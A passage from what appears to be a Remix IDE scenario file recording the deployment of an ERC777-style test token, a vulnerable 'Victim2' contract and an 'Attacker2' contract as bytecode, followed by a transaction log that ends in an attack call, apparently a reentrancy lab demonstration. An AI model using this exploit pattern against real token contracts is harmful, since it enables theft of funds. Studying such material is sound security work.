"60806040523480156200001157600080fd5b5060405162001db538038062001db583398181016040528101906200003791906200033a565b6040518060400160405280601181526020017f455243373737205465737420546f6b656e0000000000000000000000000000008152506040518060400160405280600581526020017f546f6b656e0000000000000000000000000000000000000000000000000000008152508160039080519060200190620000bb92919062000273565b508060049080519060200190620000d492919062000273565b505050620000e93382620000f060201b60201c565b5062000537565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141562000163576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200015a90620003a4565b60405180910390fd5b62000177600083836200026960201b60201c565b80600260008282546200018b9190620003f4565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254620001e29190620003f4565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620002499190620003c6565b60405180910390a362000265600083836200026e60201b60201c565b5050565b505050565b505050565b82805462000281906200045b565b90600052602060002090601f016020900481019282620002a55760008555620002f1565b82601f10620002c057805160ff1916838001178555620002f1565b82800160010185558215620002f1579182015b82811115620002f0578251825591602001919060010190620002d3565b5b50905062000300919062000304565b5090565b5b808211156200031f57600081600090555060010162000305565b5090565b60008151905062000334816200051d565b92915050565b600060208284031215620003535762000352620004ef565b5b6000620003638482850162000323565b91505092915050565b60006200037b601f83620003e3565b91506200038882620004f4565b602082019050919050565b6200039e8162000451565b82525050565b60006020820190508181036000830152620003bf816200036c565b9050919050565b6000602082019050620003dd600083018462000393565b92915050565b600082825260208201905092915050565b6000620004018262000451565b91506200040e8362000451565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111562000446576200044562000491565b5b828201905092915050565b6000819050919050565b600060028204905060018216806200047457607f821691505b602082108114156200048b576200048a620004c0565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600080fd5b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b620005288162000451565b81146200053457600080fd5b50565b61186e80620005476000396000f3fe6080604052600436106100a75760003560e01c806370a082311161006457806370a08231146101e457806395d89b4114610221578063a457c2d71461024c578063a9059cbb14610289578063dd62ed3e146102c6578063f088d54714610303576100a7565b806306fdde03146100ac578063095ea7b3146100d757806318160ddd1461011457806323b872dd1461013f578063313ce5671461017c57806339509351146101a7575b600080fd5b3480156100b857600080fd5b506100c161031f565b6040516100ce919061129b565b60405180910390f35b3480156100e357600080fd5b506100fe60048036038101906100f9919061100b565b6103b1565b60405161010b9190611280565b60405180910390f35b34801561012057600080fd5b506101296103d4565b60405161013691906113bd565b60405180910390f35b34801561014b57600080fd5b5061016660048036038101906101619190610fb8565b6103de565b6040516101739190611280565b60405180910390f35b34801561018857600080fd5b5061019161040a565b60405161019e91906113d8565b60405180910390f35b3480156101b357600080fd5b506101ce60048036038101906101c9919061100b565b610413565b6040516101db9190611280565b60405180910390f35b3480156101f057600080fd5b5061020b60048036038101906102069190610f4b565b6104bd565b60405161021891906113bd565b60405180910390f35b34801561022d57600080fd5b50610236610505565b604051610243919061129b565b60405180910390f35b34801561025857600080fd5b50610273600480360381019061026e919061100b565b610597565b6040516102809190611280565b60405180910390f35b34801561029557600080fd5b506102b060048036038101906102ab919061100b565b610681565b6040516102bd9190611280565b60405180910390f35b3480156102d257600080fd5b506102ed60048036038101906102e89190610f78565b6106ab565b6040516102fa91906113bd565b60405180910390f35b61031d60048036038101906103189190610f4b565b610732565b005b60606003805461032e90611509565b80601f016020809104026020016040519081016040528092919081815260200182805461035a90611509565b80156103a75780601f1061037c576101008083540402835291602001916103a7565b820191906000526020600020905b81548152906001019060200180831161038a57829003601f168201915b5050505050905090565b6000806103bc61073f565b90506103c9818585610747565b600191505092915050565b6000600254905090565b60006103eb848484610912565b6103f457600080fd5b6103ff848484610941565b600190509392505050565b60006012905090565b60008061041e61073f565b90506104b2818585600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546104ad919061142b565b610747565b600191505092915050565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60606004805461051490611509565b80601f016020809104026020016040519081016040528092919081815260200182805461054090611509565b801561058d5780601f106105625761010080835404028352916020019161058d565b820191906000526020600020905b81548152906001019060200180831161057057829003601f168201915b5050505050905090565b6000806105a261073f565b90506000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905083811015610668576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161065f9061137d565b60405180910390fd5b6106758286868403610747565b60019250505092915050565b600061068d8383610a64565b61069657600080fd5b6106a1338484610941565b6001905092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b61073c8134610a87565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156107b7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107ae9061135d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610827576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161081e906112dd565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161090591906113bd565b60405180910390a3505050565b60008061091d61073f565b905061092a858285610be7565b610935858585610c73565b60019150509392505050565b61094a82610ef4565b15610a5f578173ffffffffffffffffffffffffffffffffffffffff166223de296000858585600067ffffffffffffffff81111561098a57610989611599565b5b6040519080825280601f01601f1916602001820160405280156109bc5781602001600182028036833780820191505090505b50600067ffffffffffffffff8111156109d8576109d7611599565b5b6040519080825280601f01601f191660200182016040528015610a0a5781602001600182028036833780820191505090505b506040518763ffffffff1660e01b8152600401610a2c96959493929190611211565b600060405180830381600087803b158015610a4657600080fd5b505af1158015610a5a573d6000803e3d6000fd5b505050505b505050565b600080610a6f61073f565b9050610a7c818585610c73565b600191505092915050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610af7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aee9061139d565b60405180910390fd5b610b0360008383610f17565b8060026000828254610b15919061142b565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610b6a919061142b565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610bcf91906113bd565b60405180910390a3610be360008383610f1c565b5050565b6000610bf384846106ab565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610c6d5781811015610c5f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c56906112fd565b60405180910390fd5b610c6c8484848403610747565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610ce3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cda9061133d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610d53576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4a906112bd565b60405180910390fd5b610d5e838383610f17565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610de4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ddb9061131d565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610e77919061142b565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610edb91906113bd565b60405180910390a3610eee848484610f1c565b50505050565b6000808273ffffffffffffffffffffffffffffffffffffffff163b119050919050565b505050565b505050565b600081359050610f308161180a565b92915050565b600081359050610f4581611821565b92915050565b600060208284031215610f6157610f606115c8565b5b6000610f6f84828501610f21565b91505092915050565b60008060408385031215610f8f57610f8e6115c8565b5b6000610f9d85828601610f21565b9250506020610fae85828601610f21565b9150509250929050565b600080600060608486031215610fd157610fd06115c8565b5b6000610fdf86828701610f21565b9350506020610ff086828701610f21565b925050604061100186828701610f36565b9150509250925092565b60008060408385031215611022576110216115c8565b5b600061103085828601610f21565b925050602061104185828601610f36565b9150509250929050565b61105481611481565b82525050565b61106381611493565b82525050565b6000611074826113f3565b61107e8185611409565b935061108e8185602086016114d6565b611097816115cd565b840191505092915050565b60006110ad826113fe565b6110b7818561141a565b93506110c78185602086016114d6565b6110d0816115cd565b840191505092915050565b60006110e860238361141a565b91506110f3826115de565b604082019050919050565b600061110b60228361141a565b91506111168261162d565b604082019050919050565b600061112e601d8361141a565b91506111398261167c565b602082019050919050565b600061115160268361141a565b915061115c826116a5565b604082019050919050565b600061117460258361141a565b915061117f826116f4565b604082019050919050565b600061119760248361141a565b91506111a282611743565b604082019050919050565b60006111ba60258361141a565b91506111c582611792565b604082019050919050565b60006111dd601f8361141a565b91506111e8826117e1565b602082019050919050565b6111fc816114bf565b82525050565b61120b816114c9565b82525050565b600060c082019050611226600083018961104b565b611233602083018861104b565b611240604083018761104b565b61124d60608301866111f3565b818103608083015261125f8185611069565b905081810360a08301526112738184611069565b9050979650505050505050565b6000602082019050611295600083018461105a565b92915050565b600060208201905081810360008301526112b581846110a2565b905092915050565b600060208201905081810360008301526112d6816110db565b9050919050565b600060208201905081810360008301526112f6816110fe565b9050919050565b6000602082019050818103600083015261131681611121565b9050919050565b6000602082019050818103600083015261133681611144565b9050919050565b6000602082019050818103600083015261135681611167565b9050919050565b600060208201905081810360008301526113768161118a565b9050919050565b60006020820190508181036000830152611396816111ad565b9050919050565b600060208201905081810360008301526113b6816111d0565b9050919050565b60006020820190506113d260008301846111f3565b92915050565b60006020820190506113ed6000830184611202565b92915050565b600081519050919050565b600081519050919050565b600082825260208201905092915050565b600082825260208201905092915050565b6000611436826114bf565b9150611441836114bf565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156114765761147561153b565b5b828201905092915050565b600061148c8261149f565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b838110156114f45780820151818401526020810190506114d9565b83811115611503576000848401525b50505050565b6000600282049050600182168061152157607f821691505b602082108114156115355761153461156a565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b600080fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b61181381611481565b811461181e57600080fd5b50565b61182a816114bf565b811461183557600080fd5b5056fea2646970667358221220022e88d7b06f5f395c84036d7be3b2e46634e930398e49d5a9509c0fbab80bc064736f6c63430008060033", 18 | "linkReferences": {}, 19 | "name": "", 20 | "inputs": "(uint256)", 21 | "type": "constructor", 22 | "from": "account{0}" 23 | } 24 | }, 25 | { 26 | "timestamp": 1650474395581, 27 | "record": { 28 | "value": "0", 29 | "parameters": [ 30 | "created{1650474338320}" 31 | ], 32 | "abi": "0xa394c22e641004cf0bd13bef73528d4f470423a89cad1d16a32bd32435267d4e", 33 | "contractName": "Victim2", 34 | "bytecode": "608060405234801561001057600080fd5b506040516108d13803806108d18339818101604052810190610032919061008d565b806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050610108565b600081519050610087816100f1565b92915050565b6000602082840312156100a3576100a26100ec565b5b60006100b184828501610078565b91505092915050565b60006100c5826100cc565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600080fd5b6100fa816100ba565b811461010557600080fd5b50565b6107ba806101176000396000f3fe608060405234801561001057600080fd5b50600436106100565760003560e01c806223de291461005b57806351cff8d91461007757806355a3b2c114610093578063b6b55f25146100c3578063fc0c546a146100df575b600080fd5b61007560048036038101906100709190610449565b6100fd565b005b610091600480360381019061008c919061041c565b61015d565b005b6100ad60048036038101906100a8919061041c565b610298565b6040516100ba919061061a565b60405180910390f35b6100dd60048036038101906100d89190610545565b6102b0565b005b6100e7610363565b6040516100f491906105ff565b60405180910390f35b84600160008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461014c9190610635565b925050819055505050505050505050565b6000600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905060008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663a9059cbb83836040518363ffffffff1660e01b81526004016101fc9291906105d6565b602060405180830381600087803b15801561021657600080fd5b505af115801561022a573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061024e9190610518565b506000600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b60016020528060005260406000206000915090505481565b60008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166323b872dd3330846040518463ffffffff1660e01b815260040161030d9392919061059f565b602060405180830381600087803b15801561032757600080fd5b505af115801561033b573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061035f9190610518565b5050565b60008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000813590506103968161073f565b92915050565b6000815190506103ab81610756565b92915050565b60008083601f8401126103c7576103c661072b565b5b8235905067ffffffffffffffff8111156103e4576103e3610726565b5b602083019150836001820283011115610400576103ff610730565b5b9250929050565b6000813590506104168161076d565b92915050565b6000602082840312156104325761043161073a565b5b600061044084828501610387565b91505092915050565b60008060008060008060008060c0898b0312156104695761046861073a565b5b60006104778b828c01610387565b98505060206104888b828c01610387565b97505060406104998b828c01610387565b96505060606104aa8b828c01610407565b955050608089013567ffffffffffffffff8111156104cb576104ca610735565b5b6104d78b828c016103b1565b945094505060a089013567ffffffffffffffff8111156104fa576104f9610735565b5b6105068b828c016103b1565b92509250509295985092959890939650565b60006020828403121561052e5761052d61073a565b5b600061053c8482850161039c565b91505092915050565b60006020828403121561055b5761055a61073a565b5b600061056984828501610407565b91505092915050565b61057b8161068b565b82525050565b61058a816106d3565b82525050565b610599816106c9565b82525050565b60006060820190506105b46000830186610572565b6105c16020830185610572565b6105ce6040830184610590565b949350505050565b60006040820190506105eb6000830185610572565b6105f86020830184610590565b9392505050565b60006020820190506106146000830184610581565b92915050565b600060208201905061062f6000830184610590565b92915050565b6000610640826106c9565b915061064b836106c9565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156106805761067f6106f7565b5b828201905092915050565b6000610696826106a9565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b60006106de826106e5565b9050919050565b60006106f0826106a9565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600080fd5b600080fd5b600080fd5b600080fd5b600080fd5b6107488161068b565b811461075357600080fd5b50565b61075f8161069d565b811461076a57600080fd5b50565b610776816106c9565b811461078157600080fd5b5056fea2646970667358221220c385e6e0460c8c9647185e711f38ca396ecad93b552aac09c3e08edbc09f179b64736f6c63430008060033", 35 | "linkReferences": {}, 36 | "name": "", 37 | "inputs": "(address)", 38 | "type": "constructor", 39 | "from": "account{0}" 40 | } 41 | }, 42 | { 43 | "timestamp": 1650474439210, 44 | "record": { 45 | "value": "0", 46 | "parameters": [ 47 | "created{1650474395581}", 48 | "10000000000000000000" 49 | ], 50 | "to": "created{1650474338320}", 51 | "abi": "0x3e91d4a4cb3d9af06253d1e2a6db8ea31b4981cfbf80b7c1a367ad75e462ea98", 52 | "name": "transfer", 53 | "inputs": "(address,uint256)", 54 | "type": "function", 55 | "from": "account{0}" 56 | } 57 | }, 58 | { 59 | "timestamp": 1650474514599, 60 | "record": { 61 | "value": "0", 62 | "parameters": [ 63 | "created{1650474395581}", 64 | "created{1650474338320}" 65 | ], 66 | "abi": "0xeaf12dbffab8e47aa1b27e4e9d838ee0b6048bf42f57fc6134a598bc42bfc5bd", 67 | "contractName": "Attacker2", 68 | "bytecode": "608060405234801561001057600080fd5b50604051610aea380380610aea833981810160405281019061003291906100cf565b816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555080600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550505061015d565b6000815190506100c981610146565b92915050565b600080604083850312156100e6576100e5610141565b5b60006100f4858286016100ba565b9250506020610105858286016100ba565b9150509250929050565b600061011a82610121565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600080fd5b61014f8161010f565b811461015a57600080fd5b50565b61097e8061016c6000396000f3fe608060405234801561001057600080fd5b506004361061004b5760003560e01c806223de291461005057806364dd891a1461006c578063930c200314610088578063fc0c546a146100a6575b600080fd5b61006a600480360381019061006591906105fc565b6100c4565b005b610086600480360381019061008191906106f8565b61026d565b005b610090610508565b60405161009d9190610824565b60405180910390f35b6100ae61052c565b6040516100bb9190610809565b60405180910390f35b60008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff161461011c57610263565b670de0b6b3a7640000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166370a08231896040518263ffffffff1660e01b8152600401610180919061078e565b60206040518083038186803b15801561019857600080fd5b505afa1580156101ac573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906101d09190610725565b11156102625760008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166351cff8d9306040518263ffffffff1660e01b815260040161022f919061078e565b600060405180830381600087803b15801561024957600080fd5b505af115801561025d573d6000803e3d6000fd5b505050505b5b5050505050505050565b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166323b872dd3330846040518463ffffffff1660e01b81526004016102cc939291906107a9565b602060405180830381600087803b1580156102e657600080fd5b505af11580156102fa573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061031e91906106cb565b50600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663095ea7b360008054906101000a900473ffffffffffffffffffffffffffffffffffffffff16836040518363ffffffff1660e01b815260040161039c9291906107e0565b602060405180830381600087803b1580156103b657600080fd5b505af11580156103ca573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906103ee91906106cb565b5060008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663b6b55f25826040518263ffffffff1660e01b8152600401610448919061083f565b600060405180830381600087803b15801561046257600080fd5b505af1158015610476573d6000803e3d6000fd5b5050505060008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166351cff8d9306040518263ffffffff1660e01b81526004016104d3919061078e565b600060405180830381600087803b1580156104ed57600080fd5b505af1158015610501573d6000803e3d6000fd5b5050505050565b60008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60008135905061056181610903565b92915050565b6000815190506105768161091a565b92915050565b60008083601f840112610592576105916108ef565b5b8235905067ffffffffffffffff8111156105af576105ae6108ea565b5b6020830191508360018202830111156105cb576105ca6108f4565b5b9250929050565b6000813590506105e181610931565b92915050565b6000815190506105f681610931565b92915050565b60008060008060008060008060c0898b03121561061c5761061b6108fe565b5b600061062a8b828c01610552565b985050602061063b8b828c01610552565b975050604061064c8b828c01610552565b965050606061065d8b828c016105d2565b955050608089013567ffffffffffffffff81111561067e5761067d6108f9565b5b61068a8b828c0161057c565b945094505060a089013567ffffffffffffffff8111156106ad576106ac6108f9565b5b6106b98b828c0161057c565b92509250509295985092959890939650565b6000602082840312156106e1576106e06108fe565b5b60006106ef84828501610567565b91505092915050565b60006020828403121561070e5761070d6108fe565b5b600061071c848285016105d2565b91505092915050565b60006020828403121561073b5761073a6108fe565b5b6000610749848285016105e7565b91505092915050565b61075b8161085a565b82525050565b61076a816108a2565b82525050565b610779816108c6565b82525050565b61078881610898565b82525050565b60006020820190506107a36000830184610752565b92915050565b60006060820190506107be6000830186610752565b6107cb6020830185610752565b6107d8604083018461077f565b949350505050565b60006040820190506107f56000830185610752565b610802602083018461077f565b9392505050565b600060208201905061081e6000830184610761565b92915050565b60006020820190506108396000830184610770565b92915050565b6000602082019050610854600083018461077f565b92915050565b600061086582610878565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b60006108ad826108b4565b9050919050565b60006108bf82610878565b9050919050565b60006108d1826108d8565b9050919050565b60006108e382610878565b9050919050565b600080fd5b600080fd5b600080fd5b600080fd5b600080fd5b61090c8161085a565b811461091757600080fd5b50565b6109238161086c565b811461092e57600080fd5b50565b61093a81610898565b811461094557600080fd5b5056fea26469706673582212203d21d4fe118a1ad37031cb6cc19a6d9076d4499ced41142075c40a2b75f50d9b64736f6c63430008060033", 69 | "linkReferences": {}, 70 | "name": "", 71 | "inputs": "(address,address)", 72 | "type": "constructor", 73 | "from": "account{1}" 74 | } 75 | }, 76 | { 77 | "timestamp": 1650474615350, 78 | "record": { 79 | "value": "5000000000000000000", 80 | "parameters": [ 81 | "0x5B38Da6a701c568545dCfcB03FcB875f56beddC4" 82 | ], 83 | "to": "created{1650474338320}", 84 | "abi": "0x3e91d4a4cb3d9af06253d1e2a6db8ea31b4981cfbf80b7c1a367ad75e462ea98", 85 | "name": "buy", 86 | "inputs": "(address)", 87 | "type": "function", 88 | "from": "account{0}" 89 | } 90 | }, 91 | { 92 | "timestamp": 1650474678830, 93 | "record": { 94 | "value": "5000000000000000000", 95 | "parameters": [ 96 | "0xAb8483F64d9C6d1EcF9b849Ae677dD3315835cb2" 97 | ], 98 | "to": "created{1650474338320}", 99 | "abi": "0x3e91d4a4cb3d9af06253d1e2a6db8ea31b4981cfbf80b7c1a367ad75e462ea98", 100 | "name": "buy", 101 | "inputs": "(address)", 102 | "type": "function", 103 | "from": "account{1}" 104 | } 105 | }, 106 | { 107 | "timestamp": 1650474814976, 108 | "record": { 109 | "value": "0", 110 | "parameters": [ 111 | "created{1650474395581}", 112 | "5000000000000000000" 113 | ], 114 | "to": "created{1650474338320}", 115 | "abi": "0x3e91d4a4cb3d9af06253d1e2a6db8ea31b4981cfbf80b7c1a367ad75e462ea98", 116 | "name": "approve", 117 | "inputs": "(address,uint256)", 118 | "type": "function", 119 | "from": "account{0}" 120 | } 121 | }, 122 | { 123 | "timestamp": 1650474847282, 124 | "record": { 125 | "value": "0", 126 | "parameters": [ 127 | "5000000000000000000" 128 | ], 129 | "to": "created{1650474395581}", 130 | "abi": "0xa394c22e641004cf0bd13bef73528d4f470423a89cad1d16a32bd32435267d4e", 131 | "name": "deposit", 132 | "inputs": "(uint256)", 133 | "type": "function", 134 | "from": "account{0}" 135 | } 136 | }, 137 | { 138 | "timestamp": 1650474905672, 139 | "record": { 140 | "value": "0", 141 | "parameters": [ 142 | "0x5B38Da6a701c568545dCfcB03FcB875f56beddC4" 143 | ], 144 | "to": "created{1650474395581}", 145 | "abi": "0xa394c22e641004cf0bd13bef73528d4f470423a89cad1d16a32bd32435267d4e", 146 | "name": "withdraw", 147 | "inputs": "(address)", 148 | "type": "function", 149 | "from": "account{0}" 150 | } 151 | }, 152 | { 153 | "timestamp": 1650474953826, 154 | "record": { 155 | "value": "0", 156 | "parameters": [ 157 | "created{1650474395581}", 158 | "5000000000000000000" 159 | ], 160 | "to": "created{1650474338320}", 161 | "abi": "0x3e91d4a4cb3d9af06253d1e2a6db8ea31b4981cfbf80b7c1a367ad75e462ea98", 162 | "name": "approve", 163 | "inputs": "(address,uint256)", 164 | "type": "function", 165 | "from": "account{1}" 166 | } 167 | }, 168 | { 169 | "timestamp": 1650474972462, 170 | "record": { 171 | "value": "0", 172 | "parameters": [ 173 | "created{1650474514599}", 174 | "5000000000000000000" 175 | ], 176 | "to": "created{1650474338320}", 177 | "abi": "0x3e91d4a4cb3d9af06253d1e2a6db8ea31b4981cfbf80b7c1a367ad75e462ea98", 178 | "name": "approve", 179 | "inputs": "(address,uint256)", 180 | "type": "function", 181 | "from": "account{1}" 182 | } 183 | }, 184 | { 185 | "timestamp": 1650474993403, 186 | "record": { 187 | "value": "0", 188 | "parameters": [ 189 | "5000000000000000000" 190 | ], 191 | "to": "created{1650474514599}", 192 | "abi": "0xeaf12dbffab8e47aa1b27e4e9d838ee0b6048bf42f57fc6134a598bc42bfc5bd", 193 | "name": "attack", 194 | "inputs": "(uint256)", 195 | "type": "function", 196 | "from": "account{1}" 197 | } 198 | } 199 | ], 200 | "abis": { 201 | "0x3e91d4a4cb3d9af06253d1e2a6db8ea31b4981cfbf80b7c1a367ad75e462ea98": [ 202 | { 203 | "inputs": [ 204 | { 205 | "internalType": "uint256", 206 | "name": "initialSupply", 207 | "type": "uint256" 208 | } 209 | ], 210 | "stateMutability": "nonpayable", 211 | "type": "constructor" 212 | }, 213 | { 214 | "anonymous": false, 215 | "inputs": [ 216 | { 217 | "indexed": true, 218 | "internalType": "address", 219 | "name": "owner", 220 | "type": "address" 221 | }, 222 | { 223 | "indexed": true, 224 | "internalType": "address", 225 | "name": "spender", 226 | "type": "address" 227 | }, 228 | { 229 | "indexed": false, 230 | "internalType": "uint256", 231 | "name": "value", 232 | "type": "uint256" 233 | } 234 | ], 235 | "name": "Approval", 236 | "type": "event" 237 | }, 238 | { 239 | "inputs": [ 240 | { 241 | "internalType": "address", 242 | "name": "spender", 243 | "type": "address" 244 | }, 245 | { 246 | "internalType": "uint256", 247 | "name": "amount", 248 | "type": "uint256" 249 | } 250 | ], 251 | "name": "approve", 252 | "outputs": [ 253 | { 254 | "internalType": "bool", 255 | "name": "", 256 | "type": "bool" 257 | } 258 | ], 259 | "stateMutability": "nonpayable", 260 | "type": "function" 261 | }, 262 | { 263 | "inputs": [ 264 | { 265 | "internalType": "address", 266 | "name": "to", 267 | "type": "address" 268 | } 269 | ], 270 | "name": "buy", 271 | "outputs": [], 272 | "stateMutability": "payable", 273 | "type": "function" 274 | }, 275 | { 276 | "inputs": [ 277 | { 278 | "internalType": "address", 279 | "name": "spender", 280 | "type": "address" 281 | }, 282 | { 283 | "internalType": "uint256", 284 | "name": "subtractedValue", 285 | "type": "uint256" 286 | } 287 | ], 288 | "name": "decreaseAllowance", 289 | "outputs": [ 290 | { 291 | "internalType": "bool", 292 | "name": "", 293 | "type": "bool" 294 | } 295 | ], 296 | "stateMutability": "nonpayable", 297 | "type": "function" 298 | }, 299 | { 300 | "inputs": [ 301 | { 302 | "internalType": "address", 303 | "name": "spender", 304 | "type": "address" 305 | }, 306 | { 307 | "internalType": "uint256", 308 | "name": "addedValue", 309 | "type": "uint256" 310 | } 311 | ], 312 | "name": "increaseAllowance", 313 | "outputs": [ 314 | { 315 | "internalType": "bool", 316 | "name": "", 317 | "type": "bool" 318 | } 319 | ], 320 | "stateMutability": "nonpayable", 321 | "type": "function" 322 | }, 323 | { 324 | "inputs": [ 325 | { 326 | "internalType": "address", 327 | "name": "_to", 328 | "type": "address" 329 | }, 330 | { 331 | "internalType": "uint256", 